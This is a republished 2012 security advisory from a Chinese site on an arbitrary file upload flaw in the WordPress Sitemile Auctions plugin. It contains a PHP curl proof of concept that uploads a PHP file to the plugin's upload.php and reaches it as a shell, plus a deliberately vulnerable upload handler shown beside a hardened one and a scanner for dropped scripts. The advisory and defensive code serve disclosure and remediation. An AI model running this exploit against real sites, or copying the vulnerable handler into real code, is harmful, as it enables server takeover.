WordPress Sitemile Auctions Plugin arbitrary file upload vulnerability - vulnerability warning - 黑吧安全网 (myhack58)

2012-06-26T00:00:00
ID MYHACK58:62201234187
Type myhack58
Reporter Anonymous (佚名)
Modified 2012-06-26T00:00:00

Description

Release date: 2012-06-19

Update date: 2012-06-20

Affected system:

WordPress Sitemile Auctions Plugin 2.x (versions before 2.0.1.3)

Description:

--------------------------------------------------------------------------------

WordPress is a blog engine written in PHP with a MySQL database; users can build their own blog on any server that supports PHP and MySQL.

In versions of the Sitemile Auctions Plugin for WordPress before 2.0.1.3, the upload.php script under wp-content/plugins/auctionPlugin/ (reached through the uploadify/ subdirectory in the test below) accepts a file with any extension and stores it, under its original name, in a web-root folder named by the request. By uploading a malicious PHP script an attacker can therefore execute arbitrary PHP code on the server.

<*source: Sammy Forgit

Links: http://secunia.com/advisories/49497/

http://www.opensyscom.fr/Actualites/wordpress-plugins-wordpress-auctions-plugin-arbitrary-file-upload-vulnerability.html

*>
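The following is an added illustrative example, not code from the plugin or from the advisory. It sets the upload-handler pattern the description above implies (an uploadify-style upload.php that trusts a client-supplied "folder" and keeps the client's filename and extension) beside a hardened form a WordPress plugin author would write instead. The function names, the nonce action "auction_upload" and the field name "auction_upload_nonce" are assumptions for illustration; the WordPress API calls (is_user_logged_in, current_user_can, wp_verify_nonce, wp_check_filetype_and_ext, wp_handle_upload) are real.

```php
<?php
// Added illustrative example, not the plugin's code. Function names, the nonce
// action "auction_upload" and the field "auction_upload_nonce" are assumptions.

// --- Vulnerable pattern: what the advisory describes ---------------------------
function vulnerable_upload(array $files, array $get, string $docroot): ?string
{
    if (!isset($files['Filedata'], $get['folder'])) {
        return null;
    }
    // No login or nonce check: anyone who can reach upload.php may call it.
    // The destination comes straight from the query string
    // (?folder=/wordpress/wp-content/uploads/), i.e. it is attacker-chosen.
    $target_dir = rtrim($docroot, '/') . '/' . trim($get['folder'], '/') . '/';
    // The client's filename is kept, extension included, so lo.php is stored
    // as lo.php and the web server will hand it to the PHP interpreter.
    $target = $target_dir . basename($files['Filedata']['name']);
    return move_uploaded_file($files['Filedata']['tmp_name'], $target) ? $target : null;
}

// --- Hardened form ---------------------------------------------------------------
// Assumes it runs inside WordPress, so the wp_* / current_user_can() functions exist.
function hardened_upload(array $files, array $post): array
{
    // 1. Who: only authenticated users the site already trusts to upload files.
    if (!is_user_logged_in() || !current_user_can('upload_files')) {
        return ['error' => 'not allowed'];
    }
    // 2. Intent: a nonce bound to this action, so a forged cross-site POST fails.
    if (empty($post['auction_upload_nonce'])
        || !wp_verify_nonce($post['auction_upload_nonce'], 'auction_upload')) {
        return ['error' => 'invalid nonce'];
    }
    if (empty($files['Filedata']['tmp_name']) || !is_uploaded_file($files['Filedata']['tmp_name'])) {
        return ['error' => 'no file'];
    }
    // 3. What: an explicit allow-list of extension/MIME pairs. A name ending in
    //    .php matches nothing here and is rejected; for image types WordPress also
    //    compares the claimed type with the file's actual bytes.
    $allowed = [
        'jpg|jpeg' => 'image/jpeg',
        'png'      => 'image/png',
        'gif'      => 'image/gif',
    ];
    $check = wp_check_filetype_and_ext(
        $files['Filedata']['tmp_name'],
        $files['Filedata']['name'],
        $allowed
    );
    if (empty($check['ext']) || empty($check['type'])) {
        return ['error' => 'file type not permitted'];
    }
    // 4. Where: never taken from the request. wp_handle_upload() writes into the
    //    configured uploads directory under a sanitised, unique filename and
    //    applies the same allow-list a second time.
    if (!function_exists('wp_handle_upload')) {
        require_once ABSPATH . 'wp-admin/includes/file.php';
    }
    $result = wp_handle_upload($files['Filedata'], ['test_form' => false, 'mimes' => $allowed]);
    if (isset($result['error'])) {
        return ['error' => $result['error']];
    }
    return ['file' => $result['file'], 'url' => $result['url']];
}
```

Three things distinguish the hardened handler: the caller must be authenticated and authorised, the permitted file types are an explicit allow-list rather than "anything", and the destination directory is fixed by configuration rather than read from the URL. An extension allow-list on its own is still only one layer; denying script execution under wp-content/uploads in the web-server configuration limits the damage if a check is ever bypassed.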

Test method:

--------------------------------------------------------------------------------

Warning

The following procedures (methods) may be offensive in nature and are provided for security research and teaching purposes only. Use them at your own risk!

Sammy Forgit provides the following test method:

PostShell.php

<?php
// Proof of concept (Sammy Forgit): POST a PHP file to the plugin's uploadify
// handler. The "folder" parameter names the destination directory under the
// web root and no extension check is applied, so lo.php is stored as-is.
$uploadfile = "lo.php";

$ch = curl_init("http://www.exemple.com/wordpress/wp-content/plugins/auctionPlugin/uploadify/upload.php?folder=/wordpress/wp-content/uploads/");
curl_setopt($ch, CURLOPT_POST, true);
// The original used the "@filename" upload syntax, which PHP 7 removed;
// CURLFile is the current equivalent and the fallback keeps the old form.
$filedata = class_exists('CURLFile') ? new CURLFile($uploadfile) : "@$uploadfile";
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata' => $filedata));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$postResult = curl_exec($ch);
curl_close($ch);

// The response body contains the name under which the file was stored.
print "$postResult";
?>

Shell access: http://www.exemple.com/wordpress/wp-content/uploads/lo.php

Filename: run PostShell.php and view its output (Ctrl-U for the page source); the server's response contains the name under which the uploaded file was stored.

lo.php

<?php
// Harmless payload used to prove that uploaded PHP is executed; any PHP code could be substituted.
phpinfo();
?>

Recommendations:

--------------------------------------------------------------------------------

Vendor patch:

WordPress

---------

The vendor has released an updated version that fixes this issue (Sitemile Auctions Plugin 2.0.1.3 or later; it is the plugin, not WordPress core, that needs updating). Download it from the vendor's home page:

http://wordpress.org/
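Upgrading closes the upload hole but does not remove anything already dropped through it. The following is an added post-incident check, not part of the advisory: it walks a WordPress uploads directory and reports files that should never be there, whether they carry a script extension like the advisory's lo.php or hide a PHP open tag behind another extension. The default directory path is an assumption; pass the real one as the first argument.

```php
<?php
// Added post-incident check, not from the advisory. The default path below is an
// assumption; supply the real uploads directory as argv[1].

function find_suspicious_uploads(string $uploads_dir): array
{
    $script_exts = ['php', 'php3', 'php4', 'php5', 'php7', 'phtml', 'phar', 'pht'];
    $findings = [];

    $iter = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($uploads_dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($iter as $file) {
        if (!$file->isFile()) {
            continue;
        }
        $path = $file->getPathname();
        $name = $file->getFilename();
        $reasons = [];

        // 1. A script extension anywhere after the first dot: catches lo.php and
        //    also lo.php.jpg, which some Apache configurations still hand to PHP.
        $parts = explode('.', strtolower($name));
        array_shift($parts); // drop the base name, keep only the extensions
        foreach ($parts as $part) {
            if (in_array($part, $script_exts, true)) {
                $reasons[] = "script extension .$part";
                break;
            }
        }
        // 2. A .htaccess inside uploads can re-enable script execution or remap types.
        if ($name === '.htaccess') {
            $reasons[] = 'web-server override file in uploads';
        }
        // 3. Content check: a PHP open tag in the first 4 KiB, whatever the extension.
        $head = @file_get_contents($path, false, null, 0, 4096);
        if ($head !== false && preg_match('/<\?(php\b|=)/i', $head)) {
            $reasons[] = 'PHP open tag in content';
        }

        if ($reasons) {
            $findings[] = [
                'path'   => $path,
                'mtime'  => date('c', $file->getMTime()), // pivot into access logs from here
                'reason' => implode('; ', $reasons),
            ];
        }
    }
    return $findings;
}

// Usage: php find_uploads.php /var/www/wordpress/wp-content/uploads
$dir = $argv[1] ?? '/var/www/wordpress/wp-content/uploads'; // assumed path
foreach (find_suspicious_uploads($dir) as $f) {
    printf("%s  %s  %s\n", $f['mtime'], $f['path'], $f['reason']);
}
```

The modification time of each hit is the natural pivot into the web-server access log: look for the POST to auctionPlugin/uploadify/upload.php just before it, and for later GET requests to the file itself. The content check reads only the first 4 KiB, so a shell appended to the tail of an otherwise valid image would be missed; a full-file search (for example grep -rl '<?php' over the directory) complements it.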